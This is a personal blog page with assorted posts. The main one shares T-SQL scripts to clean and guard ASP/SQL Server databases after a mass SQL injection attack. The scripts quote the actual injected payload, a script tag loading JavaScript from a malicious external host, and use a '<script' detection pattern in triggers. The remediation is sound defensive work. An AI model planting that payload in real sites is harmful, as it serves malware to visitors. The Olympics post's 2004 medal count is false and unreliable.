A day in the life of an audio visual junkie
31 Aug
We all know people like to comment on blogs for SEO purposes. Whenever I read an article that has a comment box in it, I almost automatically think of writing a comment to show some love and get a nice little link back to my website. Of course, by default these are NOFOLLOW links, but they are links just the same and help advertise your website. Whenever I do that, I always try to write something witty. I usually find myself checking out a person’s blog if I find his comment witty or interesting, as opposed to the 298,349,834 other variations of the “nice post, thanks!” crap, which serve no purpose other than to pollute the internet with more spammage.
Take, for example, the five most recent comments on my blog. I know Gnob is Bong and is commenting just to get some link back love. At least he took 10 seconds to type something interesting and contributory, as opposed to the last 2 comments, which are basically no-brainers you can cut and paste into every damn blog post you can find.
That is why I usually mark these comments as spam. Good riddance!
/end rant
28 Aug
Had my hands full these past 2 months trying to fix SQL-injected websites. It looks like this is the result of a recent string of attacks by Chinese hackers primarily exploiting websites running on ASP Classic with Microsoft SQL Server as the back-end database. Some of my sites had small amounts of data, which can be very easily cleaned up by hand. However, others can be so huge and impossibly difficult for a brute force solution that an automated script is necessary to fix the problem. After asking around, one of my friends e-mailed me this. It gives no credit to the original source, so if this is yours, please e-mail me so that I can give due credit.
Automatically clean up a database infected by SQL injection:
BEGIN
  -- The exact string the attacker appended to every string column.
  -- It is handed to sp_executesql as a parameter, so it needs no quote escaping.
  DECLARE @Injected NVARCHAR(4000)
  SET @Injected = N'"></title><script src="http://www3.800mg.cn/csrss/w.js"></script><!--'
  DECLARE @tblTable varchar(255), @colColumnName varchar(255), @Cmd NVARCHAR(4000)
  -- Every column of a user table whose type can hold the payload:
  -- 99 = ntext, 35 = text, 231 = nvarchar, 167 = varchar
  DECLARE curSQLinjectionDataClean CURSOR FOR
  SELECT a.name, b.name
  FROM sysobjects a, syscolumns b
  WHERE a.id = b.id AND a.xtype = 'U' AND
  (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167)
  OPEN curSQLinjectionDataClean
  FETCH NEXT FROM curSQLinjectionDataClean INTO @tblTable, @colColumnName
  WHILE (@@FETCH_STATUS = 0)
  BEGIN
    -- Chop the payload off the end of every value that ends with it.
    -- The CAST to NVARCHAR(MAX) is needed because LEFT, RIGHT and LEN do not
    -- accept text/ntext columns (SQL Server 2005 or later; on 2000 drop the
    -- CAST and leave xtype 35 and 99 out of the cursor).
    SET @Cmd = 'UPDATE [' + @tblTable + '] SET [' + @colColumnName + '] = LEFT(CAST([' + @colColumnName + '] AS NVARCHAR(MAX)), LEN(CAST([' + @colColumnName + '] AS NVARCHAR(MAX))) - LEN(@Injected))
    WHERE RIGHT(CAST([' + @colColumnName + '] AS NVARCHAR(MAX)), LEN(@Injected)) = @Injected'
    exec sp_executesql @Cmd, N'@Injected NVARCHAR(4000)', @Injected
    FETCH NEXT FROM curSQLinjectionDataClean INTO @tblTable, @colColumnName
  END
  CLOSE curSQLinjectionDataClean
  DEALLOCATE curSQLinjectionDataClean
END
Replace the value of @Injected with the exact string that was injected into your data. Note that this only cleans records that are victims of SQL string injection, i.e. values that end with that string; if the attack ran more than once and appended it repeatedly, run the script again until nothing is left.
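Before running the cleanup (and again afterwards, to confirm it worked) it helps to know how many rows in which columns actually carry the payload. The following is an added example, not code from the original post or from whoever wrote the script; it assumes SQL Server 2005 or later and the same injected string as above, held in @Injected.

```sql
-- Added example: count rows still carrying the injected string, per column.
-- Read-only, so it can be run before the cleanup to see the blast radius
-- and afterwards to confirm nothing was missed.
-- Assumes SQL Server 2005 or later (sys.* catalog views, NVARCHAR(MAX)).
SET NOCOUNT ON

DECLARE @Injected NVARCHAR(4000)
SET @Injected = N'"></title><script src="http://www3.800mg.cn/csrss/w.js"></script><!--'

DECLARE @Hits TABLE (TableName NVARCHAR(300), ColumnName SYSNAME, HitRows INT)
DECLARE @Schema SYSNAME, @Table SYSNAME, @Column SYSNAME
DECLARE @Sql NVARCHAR(MAX), @n INT

-- Every column of a user table whose base type can hold the payload.
DECLARE curCols CURSOR LOCAL FAST_FORWARD FOR
    SELECT s.name, t.name, c.name
    FROM sys.tables t
    JOIN sys.schemas s ON s.schema_id = t.schema_id
    JOIN sys.columns c ON c.object_id = t.object_id
    WHERE TYPE_NAME(c.system_type_id) IN ('char', 'varchar', 'nchar', 'nvarchar', 'text', 'ntext')
OPEN curCols
FETCH NEXT FROM curCols INTO @Schema, @Table, @Column
WHILE @@FETCH_STATUS = 0
BEGIN
    -- Only identifiers are spliced into the dynamic SQL, and only via QUOTENAME;
    -- the payload itself travels as an sp_executesql parameter, so it needs
    -- no quote escaping and its characters are never treated as LIKE wildcards.
    SET @Sql = N'SELECT @n = COUNT(*) FROM ' + QUOTENAME(@Schema) + N'.' + QUOTENAME(@Table)
             + N' WHERE CHARINDEX(@p, CAST(' + QUOTENAME(@Column) + N' AS NVARCHAR(MAX))) > 0'
    EXEC sp_executesql @Sql, N'@p NVARCHAR(4000), @n INT OUTPUT', @p = @Injected, @n = @n OUTPUT
    IF @n > 0
        INSERT INTO @Hits (TableName, ColumnName, HitRows)
        VALUES (@Schema + N'.' + @Table, @Column, @n)
    FETCH NEXT FROM curCols INTO @Schema, @Table, @Column
END
CLOSE curCols
DEALLOCATE curCols

-- Worst-hit columns first; an empty result after the cleanup means it worked.
SELECT TableName, ColumnName, HitRows
FROM @Hits
ORDER BY HitRows DESC, TableName, ColumnName
```

The same parameterised pattern cleans the data in one pass if you swap the SELECT for UPDATE ... SET [col] = REPLACE(CAST([col] AS NVARCHAR(MAX)), @p, N''), which also removes the string when it was appended more than once.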
To prevent future SQL injection:
BEGIN
  -- Puts an INSERT/UPDATE trigger on every table that has a string column
  -- long enough to hold the payload; the trigger rolls back any statement
  -- that tries to write a <script tag into one of those columns. It stops
  -- the payload landing again; it does not fix the ASP code the attacker
  -- used to run SQL in the first place.
  DECLARE @tblInjectedTable TABLE (colTableName varchar(255))
  DECLARE @tblInjectedColumn TABLE (colRecordID INT IDENTITY(1,1), colColumnName varchar(255))
  DECLARE @tblTable varchar(255), @colColumnName varchar(255), @Cmd NVARCHAR(4000),
          @iCount SMALLINT, @iCountTo SMALLINT, @iBase INT, @WhereCmd NVARCHAR(4000)
  -- User tables with at least one string column longer than 99 bytes
  -- (99 = ntext, 35 = text, 231 = nvarchar, 167 = varchar)
  INSERT INTO @tblInjectedTable(colTableName)
  SELECT DISTINCT a.name
  FROM sysobjects a, syscolumns b
  WHERE a.id = b.id AND a.xtype = 'U' AND b.length > 99 AND
  (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167)
  DECLARE curSQLInjectedTable CURSOR FOR
  SELECT colTableName FROM @tblInjectedTable
  OPEN curSQLInjectedTable
  FETCH NEXT FROM curSQLInjectedTable INTO @tblTable
  WHILE (@@FETCH_STATUS = 0)
  BEGIN
    -- A table variable cannot be truncated or reseeded, so the column list
    -- keeps growing; remember where this table's columns start.
    SELECT @iBase = ISNULL(MAX(colRecordID), 0) FROM @tblInjectedColumn
    INSERT INTO @tblInjectedColumn(colColumnName)
    SELECT DISTINCT b.name
    FROM sysobjects a, syscolumns b
    WHERE a.id = b.id AND a.name = @tblTable AND a.xtype = 'U' AND b.length > 99 AND
    (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167)
    SELECT @iCountTo = COUNT(*) FROM @tblInjectedColumn WHERE colRecordID > @iBase
    -- Build "WHERE ins.[c1] LIKE '%<script%' OR ins.[c2] LIKE '%<script%' ..."
    SELECT @colColumnName = colColumnName FROM @tblInjectedColumn WHERE colRecordID = @iBase + 1
    SET @WhereCmd = 'WHERE ins.[' + @colColumnName + '] LIKE ''%<script%'''
    SET @iCount = 2
    WHILE @iCount <= @iCountTo
    BEGIN
      SELECT @colColumnName = colColumnName FROM @tblInjectedColumn WHERE colRecordID = @iBase + @iCount
      SET @WhereCmd = @WhereCmd + ' OR ins.[' + @colColumnName + '] LIKE ''%<script%'''
      SET @iCount = @iCount + 1
    END
    -- One trigger per table: count the incoming rows that carry a <script tag
    -- and roll the whole statement back if there are any.
    SET @Cmd = 'CREATE TRIGGER [t' + @tblTable + '] ON [' + @tblTable + '] FOR INSERT, UPDATE AS
    BEGIN DECLARE @iCount BIGINT SET @iCount = 0 SELECT @iCount = COUNT(*) FROM inserted ins '
    + @WhereCmd + ' IF @iCount > 0 ROLLBACK TRANSACTION END'
    exec sp_executesql @Cmd
    FETCH NEXT FROM curSQLInjectedTable INTO @tblTable
  END
  CLOSE curSQLInjectedTable
  DEALLOCATE curSQLInjectedTable
END
This is all very easy to do. It took me less than two minutes to copy and paste the two code blocks above, make changes to the first one, and execute them on MS SQL. Of course, I tested this first on a backup copy just in case. When trying out something unfamiliar for the first time, always make a backup copy!
Update (09/19/2008): attaching a downloadable version of the cleanup script. Get it here!
22 Aug
Taken from the iamninoy website:
Twenty-five years ago, a man named Ninoy Aquino fought nobly for a cause he believed in. He was a man who believed in heroism, in justice, in freedom, and he committed his life to upholding these values in a manner he thought would be for the greater good.
This man Ninoy lived bravely. And in his conviction and courage, he died a hero.
21 Aug

It seems like a lot of Philippine banks are into rebranding lately, in a Web 2.0-ish fashion. There’s UCPB, BDO, UnionBank, Metrobank and now Bank of the Philippine Islands or BPI.
The rebranding, in my opinion, is a success. They managed to make the font look up-to-date without losing the class of the old logo.

Lately I’m really loving the font they used. It is very modern and sleek. The problem is, I don’t know the name of the font. Whoever correctly identifies the font wins a cookie.
17 Aug
Ever been in one of those days where you desperately needed a vagina and none could be found? Now you can actually make your own and carry it anywhere you want!
Pornogami FTW.
13 Aug
Five days after the opening of the 2008 Olympics in Beijing, the Philippines is still at the bottom of the pit with a grand total of 0 medals! This is a HUGE improvement over the 2004 Olympics in Athens where we managed to bag 9 medals (2 silvers and 7 bronze)! I feel ecstatic already.
When an office mate of mine told me that whoever gets the first gold medal in the 2008 Olympics was going to get 5 million pesos, a house and lot, and a car, I thought hey, that’s a good thing. No problem, right? Now all we have to do is get that gold medal.
Image and statistics courtesy of Yahoo!
12 Aug

Kom In I Garderoben is a cool Swedish site that will automatically generate an MTV-like video from any music file. The site is preloaded with a bunch of sample tunes, but you can actually upload your own MP3 file and watch as the video plays to its beat.

It’s very neat stuff, though it gets boring after a few minutes of repetition. I’m not really sure what this site is all about, though; I wish I could understand Swedish.
11 Aug
Got this in my mailbox today entitled “Prospective living in the Philippines”. Some truly hit home while some are mere exaggerations. You be the judge.